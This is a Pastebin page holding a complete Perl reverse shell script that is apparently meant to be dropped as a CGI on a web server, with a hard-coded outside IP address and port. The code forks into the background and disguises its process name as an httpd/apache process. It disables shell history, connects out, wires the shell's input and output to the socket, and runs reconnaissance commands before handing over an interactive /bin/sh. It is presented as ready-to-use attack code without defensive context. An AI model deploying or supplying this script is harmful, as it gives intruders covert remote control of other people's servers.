API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jun 19th, 2019
91
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.33 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/perl -w
  2. # perl-reverse-shell - A Reverse Shell implementation in PERL
  3. use strict;
  4. use Socket;
  5. use FileHandle;
  6. use POSIX;
  7. my $VERSION = "1.0";
  8.  
  9. # Where to send the reverse shell. Change these.
  10. my $ip = '128.1.36.27';
  11. my $port = 1234;
  12.  
  13. # Options
  14. my $daemon = 1;
  15. my $auth = 0; # 0 means authentication is disabled and any
  16. # source IP can access the reverse shell
  17. my $authorised_client_pattern = qr(^127\.0\.0\.1$);
  18.  
  19. # Declarations
  20. my $global_page = "";
  21. my $fake_process_name = "/usr/sbin/apache";
  22.  
  23. # Change the process name to be less conspicious
  24. $0 = "[httpd]";
  25.  
  26. # Authenticate based on source IP address if required
  27. if (defined($ENV{'REMOTE_ADDR'})) {
  28. cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}");
  29.  
  30. if ($auth) {
  31. unless ($ENV{'REMOTE_ADDR'} =~ $authorised_client_pattern) {
  32. cgiprint("ERROR: Your client isn't authorised to view this page");
  33. cgiexit();
  34. }
  35. }
  36. } elsif ($auth) {
  37. cgiprint("ERROR: Authentication is enabled, but I couldn't determine your IP address. Denying access");
  38. cgiexit(0);
  39. }
  40.  
  41. # Background and dissociate from parent process if required
  42. if ($daemon) {
  43. my $pid = fork();
  44. if ($pid) {
  45. cgiexit(0); # parent exits
  46. }
  47.  
  48. setsid();
  49. chdir('/');
  50. umask(0);
  51. }
  52.  
  53. # Make TCP connection for reverse shell
  54. socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
  55. if (connect(SOCK, sockaddr_in($port,inet_aton($ip)))) {
  56. cgiprint("Sent reverse shell to $ip:$port");
  57. cgiprintpage();
  58. } else {
  59. cgiprint("Couldn't open reverse shell to $ip:$port: $!");
  60. cgiexit();
  61. }
  62.  
  63. # Redirect STDIN, STDOUT and STDERR to the TCP connection
  64. open(STDIN, ">&SOCK");
  65. open(STDOUT,">&SOCK");
  66. open(STDERR,">&SOCK");
  67. $ENV{'HISTFILE'} = '/dev/null';
  68. system("w;uname -a;id;pwd");
  69. exec({"/bin/sh"} ($fake_process_name, "-i"));
  70.  
  71. # Wrapper around print
  72. sub cgiprint {
  73. my $line = shift;
  74. $line .= "<p>\n";
  75. $global_page .= $line;
  76. }
  77.  
  78. # Wrapper around exit
  79. sub cgiexit {
  80. cgiprintpage();
  81. exit 0; # 0 to ensure we don't give a 500 response.
  82. }
  83.  
  84. # Form HTTP response using all the messages gathered by cgiprint so far
  85. sub cgiprintpage {
  86. print "Content-Length: " . length($global_page) . "\r
  87. Connection: close\r
  88. Content-Type: text\/html\r\n\r\n" . $global_page;
  89. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!